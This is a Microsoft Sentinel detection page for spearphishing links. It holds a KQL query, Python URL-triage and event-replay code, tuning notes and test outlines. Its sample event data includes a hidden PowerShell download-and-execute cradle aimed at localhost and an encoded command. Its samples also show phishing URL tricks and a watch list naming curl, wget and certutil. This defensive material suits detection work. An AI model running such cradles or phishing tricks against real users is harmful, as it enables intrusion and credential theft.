T1566.002 Microsoft Sentinel · KQL

Detect Spearphishing Link in Microsoft Sentinel

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Unlike spearphishing attachments, this variant embeds URLs in the email body, so the recipient must click the link or paste it into a browser. A clicked link may deliver a browser exploit, prompt a download of malware or a script, or harvest credentials through a convincing login page. Variants that never deliver a file include OAuth consent phishing (the victim grants an attacker-controlled application delegated permissions, so the attacker receives access tokens without ever learning the password), device code phishing (the victim is coaxed into entering an attacker-initiated OAuth 2.0 device authorization code at the legitimate sign-in page, handing the attacker access and refresh tokens), and IDN homograph attacks, where lookalike Unicode domains impersonate trusted brands. URLs may also be obfuscated with URL shorteners, integer-format IP addresses (e.g., hxxp://1157586937, which a browser resolves to a dotted-quad address), or the @ symbol trick (a trusted-looking name placed in the URL's userinfo part, while the browser actually navigates to the host after the @). Threat actors including Kimsuky, MuddyWater, BlackTech and LuminousMoth, and malware families such as DarkGate and Squirrelwaffle, have extensively leveraged this technique.
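As an added illustration (not code from the original page), the following Python checks a URL for the obfuscation tricks listed above: an integer-format host is converted back to dotted-quad form, the host the browser actually navigates to is separated from the '@' decoy, punycode is decoded and confusable Cyrillic glyphs are mapped to their Latin lookalikes, and a small shortener list is consulted. The shortener and confusable tables are assumed, illustrative subsets, and every sample URL is constructed.

```python
"""Added example (not part of the original page): spot the URL obfuscation
tricks described above (integer-format IP hosts, the '@' userinfo trick,
IDN homographs, URL shorteners) using only the Python standard library.
Sample URLs are constructed; the shortener and confusable tables are
small assumed subsets, not authoritative lists."""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

# Assumed, illustrative shortener list; a real deployment would use a curated feed.
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "is.gd", "rb.gy"}

# Assumed, illustrative subset of Cyrillic letters that render like Latin ones.
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04cf": "l",
})


def refang(url: str) -> str:
    """Map report-style defanged schemes (hxxp://, hxxps://) back to real ones."""
    return url.replace("hxxps://", "https://").replace("hxxp://", "http://")


def decode_integer_host(host: str) -> str | None:
    """Return the dotted-quad form of a purely numeric host (e.g. '1157586937'), else None."""
    if host.isdecimal() and int(host) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(host)))
    return None


def to_unicode_host(host: str) -> str:
    """Decode punycode labels (xn--...) so the lookalike check sees the rendered glyphs."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already Unicode, or malformed punycode: leave as-is


def skeleton(host: str) -> str:
    """Replace confusable glyphs with their Latin lookalikes for brand comparison."""
    return host.translate(CONFUSABLES)


def analyse_url(url: str) -> dict:
    """Return the host actually navigated to plus a list of obfuscation findings."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    findings: list[str] = []

    # '@' trick: everything before '@' is userinfo; the browser goes to parts.hostname.
    if parts.username is not None:
        findings.append(f"userinfo_trick:shown={parts.username}:real={host}")

    decoded_ip = decode_integer_host(host)
    if decoded_ip:
        findings.append(f"integer_ip:{decoded_ip}")

    rendered = to_unicode_host(host)
    if not rendered.isascii():
        findings.append(f"idn_lookalike:renders_as={rendered}:skeleton={skeleton(rendered)}")

    if host in SHORTENERS:
        findings.append("url_shortener")

    return {"url": url, "host": host, "findings": findings, "suspicious": bool(findings)}


def triage(urls: list[str]) -> list[dict]:
    return [analyse_url(u) for u in urls]


# Constructed sample URLs (not real infrastructure).
SAMPLE_URLS = [
    "hxxp://1157586937/update",
    "https://login.microsoftonline.com@evil.example/auth",
    "https://www.\u0430pple.com/signin",              # Cyrillic 'a' in place of Latin 'a'
    "https://bit.ly/3abcXYZ",
    "https://contoso.sharepoint.com/sites/finance",  # benign control
]

if __name__ == "__main__":
    for result in triage(SAMPLE_URLS):
        print(result["url"], "->", result["findings"] or "clean")
```

The skeleton string is what you compare against a brand list: "www.apple.com" from the Cyrillic host would hit, while the benign SharePoint URL yields no findings at all.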

MITRE ATT&CK

Tactic
Initial Access
Technique
T1566 Phishing
Sub-technique
T1566.002 Spearphishing Link
Canonical reference
https://attack.mitre.org/techniques/T1566/002/

KQL Detection Query

Microsoft Sentinel (KQL)
kusto
let EmailClients = dynamic(["outlook.exe", "olk.exe", "thunderbird.exe", "teams.exe", "ms-teams.exe", "msoutlook.exe"]); // olk.exe = new Outlook, ms-teams.exe = new Teams
let BrowserApps = dynamic(["msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe", "opera.exe", "brave.exe"]);
let SuspiciousChildren = dynamic(["powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe"]);
// Vector 1: Email client directly spawning a suspicious process (link opens a registered protocol handler or triggers a file download).
// in~ is an exact, case-insensitive file-name match; has_any would also match on partial terms.
let EmailClientSpawn = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName in~ (EmailClients)
| where FileName in~ (SuspiciousChildren)
| extend DetectionVector = "EmailClientDirectSpawn"
| extend RiskReason = strcat("Email client '", InitiatingProcessFileName, "' spawned '", FileName, "'");
// Vector 2: Browser spawning a suspicious process (drive-by exploit or redirect to a malicious file association).
let BrowserSpawn = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName in~ (BrowserApps)
| where FileName in~ (SuspiciousChildren)
// Defensive exclusion of browser worker/helper command lines. None of these children are in SuspiciousChildren, so this only matters if that list is widened.
| where not(ProcessCommandLine has_any ("--type=renderer", "--type=utility", "--type=gpu-process", "--type=crashpad-handler", "--extension-process", "NativeMessagingHost"))
// Tuning: browser self-update chains legitimately run msiexec.exe; extend this list for other installers users launch from downloads.
| where not(FileName =~ "msiexec.exe" and ProcessCommandLine has_any ("MicrosoftEdgeUpdate", "GoogleUpdate", "ChromeSetup", "EdgeUpdate"))
| extend DetectionVector = "BrowserSpawnedSuspiciousProcess"
| extend RiskReason = strcat("Browser '", InitiatingProcessFileName, "' spawned '", FileName, "'");
// Vector 3: mshta.exe spawning further processes (phishing link -> HTA -> payload chains).
let MshtaChain = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "mshta.exe"
| where FileName in~ (SuspiciousChildren)
| extend DetectionVector = "MshtaSpawnedSuspiciousProcess"
| extend RiskReason = strcat("mshta.exe spawned '", FileName, "', possible HTA payload chain");
union EmailClientSpawn, BrowserSpawn, MshtaChain
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
         InitiatingProcessFileName, InitiatingProcessCommandLine,
         DetectionVector, RiskReason
| sort by Timestamp desc
high severity medium confidence

Detects process-spawning chains consistent with a user clicking a malicious spearphishing link. Three vectors are monitored: (1) email clients (Outlook, Thunderbird, Teams) directly spawning a scripting interpreter or LOLBin, which indicates the link triggered a registered protocol handler or a download; (2) browsers (Edge, Chrome, Firefox) spawning a suspicious child process after navigating to a phishing page, consistent with drive-by exploitation or malicious file delivery; (3) mshta.exe spawning further processes, the hallmark of a phishing link delivering an HTA file. Browser self-update invocations of msiexec.exe (Google Update, Microsoft Edge Update) are excluded, and browser worker processes (renderer, utility, GPU) never match because the child list contains only interpreters and LOLBins. The query reads DeviceProcessEvents from Microsoft Defender for Endpoint, so it requires the Microsoft Defender XDR connector in Sentinel.

Data Sources

Process: Process Creation
Microsoft Defender for Endpoint
Email: Email Opening

Required Tables

DeviceProcessEvents

False Positives & Tuning

  • Legitimate enterprise software installers triggered by browser downloads: Chrome or Edge spawning msiexec.exe for browser self-updates (Google Update, Microsoft Edge Update) is excluded by the command-line strings in the query; extend that list for other installers users legitimately launch from a download
  • Microsoft Teams or Outlook opening SharePoint/OneDrive links that trigger PowerShell-based document handlers or Office configuration scripts
  • Browser-based remote management or virtual desktop tools (Citrix Workspace, VMware Horizon, AWS AppStream) that spawn helper processes via registered browser protocol handlers
  • Security awareness training platforms (KnowBe4, Proofpoint Security Education) that simulate phishing link clicks and trigger benign download or redirect activity
  • Developer tools and IDEs that open browser links which then chain to build scripts or test runners (VS Code Live Share, JetBrains IDE browser preview)
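The three vectors of the query above, plus the browser-updater exclusion from the tuning notes, as an added Python re-implementation (not the page's KQL and not code from the original page) so the logic can be exercised offline against a few constructed DeviceProcessEvents-style rows. Field names follow the Defender for Endpoint schema; device names, accounts, paths and command lines are made up, and timestamps are assumed to be uniform ISO-8601 UTC strings so that lexical comparison stands in for the KQL time window.

```python
"""Added example (not the page's KQL and not code from the original page):
the three detection vectors plus the browser-updater exclusion, written in
Python and run over constructed DeviceProcessEvents-style rows."""
from __future__ import annotations

EMAIL_CLIENTS = {"outlook.exe", "thunderbird.exe", "teams.exe", "msoutlook.exe"}
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe", "opera.exe", "brave.exe"}
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe", "bitsadmin.exe",
    "curl.exe", "wget.exe",
}
# Tuning: browser self-update chains legitimately run msiexec with these markers (lower-cased for matching).
UPDATER_MARKERS = ("microsoftedgeupdate", "googleupdate", "chromesetup", "edgeupdate")


def classify(event: dict) -> dict | None:
    """Return a finding for one process-creation row, or None if it is not interesting."""
    parent = event["InitiatingProcessFileName"].lower()
    child = event["FileName"].lower()
    cmdline = event.get("ProcessCommandLine", "")

    if child not in SUSPICIOUS_CHILDREN:
        return None  # browser renderer/GPU workers and similar fall out here

    if parent in EMAIL_CLIENTS:
        vector = "EmailClientDirectSpawn"
        reason = f"Email client '{parent}' spawned '{child}'"
    elif parent in BROWSERS:
        if child == "msiexec.exe" and any(m in cmdline.lower() for m in UPDATER_MARKERS):
            return None  # known-good browser updater
        vector = "BrowserSpawnedSuspiciousProcess"
        reason = f"Browser '{parent}' spawned '{child}'"
    elif parent == "mshta.exe":
        vector = "MshtaSpawnedSuspiciousProcess"
        reason = f"mshta.exe spawned '{child}', possible HTA payload chain"
    else:
        return None

    return {
        "Timestamp": event["Timestamp"],
        "DeviceName": event["DeviceName"],
        "AccountName": event["AccountName"],
        "FileName": event["FileName"],
        "ProcessCommandLine": cmdline,
        "InitiatingProcessFileName": event["InitiatingProcessFileName"],
        "DetectionVector": vector,
        "RiskReason": reason,
    }


def run_detection(events: list[dict], since: str) -> list[dict]:
    """Apply the time window, classify each row and return hits newest first.

    Assumption: timestamps are ISO-8601 UTC strings of identical format, so
    lexical comparison equals chronological comparison."""
    hits = [hit for e in events if e["Timestamp"] > since and (hit := classify(e))]
    return sorted(hits, key=lambda h: h["Timestamp"], reverse=True)


def _row(ts, parent, child, cmdline, device="WS-ALICE-01", account="alice"):
    """Build one constructed DeviceProcessEvents-style row."""
    return {"Timestamp": ts, "DeviceName": device, "AccountName": account,
            "InitiatingProcessFileName": parent, "FileName": child,
            "ProcessCommandLine": cmdline}


# Constructed rows; hosts, paths and file names are illustrative only.
SAMPLE_EVENTS = [
    _row("2026-03-12T09:00:00Z", "OUTLOOK.EXE", "powershell.exe",
         "powershell.exe -WindowStyle Hidden -c IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/a')"),
    _row("2026-03-12T09:05:00Z", "msedge.exe", "mshta.exe",
         r"mshta.exe C:\Users\alice\AppData\Local\Temp\df00tech-test.hta"),
    _row("2026-03-12T09:06:00Z", "mshta.exe", "powershell.exe", "powershell.exe -enc SQBFAFgA"),
    _row("2026-03-12T09:10:00Z", "chrome.exe", "msiexec.exe", "msiexec.exe /i GoogleUpdateSetup.msi /quiet"),
    _row("2026-03-12T09:11:00Z", "explorer.exe", "cmd.exe", "cmd.exe /c whoami"),
    _row("2026-03-12T09:12:00Z", "msedge.exe", "msedge.exe", "msedge.exe --type=renderer"),
    _row("2026-03-10T08:00:00Z", "outlook.exe", "cmd.exe", "cmd.exe /c calc"),  # outside the window
]

if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS, since="2026-03-11T09:00:00Z"):
        print(hit["Timestamp"], hit["DetectionVector"], "|", hit["RiskReason"])
```

Running it prints the three findings newest first, mirroring the union and sort of the KQL; the explorer.exe row (parent not monitored), the renderer row (child not in the list), the Google Update msiexec row (tuning exclusion) and the stale row (outside the window) produce nothing.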

Testing Methodology

Validate this detection with the four Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see; executable commands and cleanup steps are available with Pro.

  1. Test 1: Email Client Spawning PowerShell via Link Handler

    Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains '-WindowStyle Hidden' and 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 (connection refused). Security Event ID 4688 if command line auditing is enabled. PowerShell ScriptBlock Log Event ID 4104 with full script content.

  2. Test 2: Browser Spawning MSHTA via HTA File Download

    Expected signal: Sysmon Event ID 1: Process Create — Image=mshta.exe, ParentImage=msedge.exe (or cmd.exe depending on Edge's open handler). Sysmon Event ID 11: File creation event for df00tech-test.hta in %TEMP%. Security Event ID 4688 for mshta.exe process creation with full command line including path to HTA file.

  3. Test 3: OAuth Device Code Phishing Flow Initiation

    Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains 'devicecode' and 'login.microsoftonline.com'. Sysmon Event ID 3: Network connection to login.microsoftonline.com on port 443. Sysmon Event ID 22: DNS query for login.microsoftonline.com. Azure AD sign-in logs: device code flow request entry visible in non-interactive sign-in logs for the test client_id (04b07795 is the Azure CLI client ID, a well-known public client).

  4. Test 4: Malicious Link Payload Drop Simulation

    Expected signal: Sysmon Event ID 11: File creation in %TEMP% for Invoice_2026-03-12.pdf.cmd (double extension with .cmd as final extension). Sysmon Event ID 1: Process Create — Image=cmd.exe, CommandLine references the %TEMP% staged file path, ParentImage=powershell.exe. Security Event ID 4688 for both powershell.exe and cmd.exe. The temporal pattern of PowerShell network activity followed by file creation in staging dir followed by cmd.exe execution matches the hunting query for email client network + file drop correlation.
